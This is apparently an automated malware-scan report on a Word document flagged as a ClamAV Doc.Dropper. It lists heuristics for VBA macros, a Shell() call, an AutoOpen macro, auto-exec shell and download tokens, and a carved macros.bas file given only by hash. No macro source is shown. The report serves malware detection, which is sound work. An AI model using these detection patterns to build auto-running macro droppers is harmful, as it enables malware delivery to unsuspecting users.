Verdict: MALICIOUS
Risk Score: 242
Heuristics: 7
- ClamAV: Doc.Dropper.Agent-6568182-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6568182-0
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: e99d9df43adc5036070c77a9d7f042d2b12ae4b13aad33670e102c6f1b58947a) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10313 bytes |
Preview script: first 1,000 lines of the extracted script